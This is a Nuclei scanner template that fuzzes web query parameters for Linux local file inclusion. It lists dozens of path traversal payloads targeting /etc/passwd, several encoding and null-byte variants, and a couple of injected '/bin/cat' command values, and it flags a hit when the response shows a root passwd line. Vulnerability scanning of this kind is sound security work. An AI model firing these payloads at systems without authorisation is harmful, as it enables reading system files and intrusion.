nuclei-templates/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml

82 lines
3.5 KiB
YAML

id: linux-lfi-fuzz
info:
name: Local File Inclusion - Linux
author: DhiyaneshDK
severity: high
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
metadata:
max-request: 46
tags: lfi,dast,linux
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
nix_fuzz:
- '/etc/passwd'
- '../../etc/passwd'
- '../../../etc/passwd'
- '/../../../../etc/passwd'
- '../../../../../../../../../etc/passwd'
- '../../../../../../../../etc/passwd'
- '../../../../../../../etc/passwd'
- '../../../../../../etc/passwd'
- '../../../../../etc/passwd'
- '../../../../etc/passwd'
- '../../../etc/passwd'
- '../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd'
- '/../../../../../../../../../../etc/passwd^^'
- '/../../../../../../../../../../etc/passwd'
- '/./././././././././././etc/passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '%252e%252e%252fetc%252fpasswd'
- '%252e%252e%252fetc%252fpasswd%00'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
- '....//....//etc/passwd'
- '..///////..////..//////etc/passwd'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
- '%0a/bin/cat%20/etc/passwd'
- '%00/etc/passwd%00'
- '%00../../../../../../etc/passwd'
- '/../../../../../../../../../../../etc/passwd%00.jpg'
- '/../../../../../../../../../../../etc/passwd%00.html'
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '\\'/bin/cat%20/etc/passwd\\''
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{nix_fuzz}}'
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950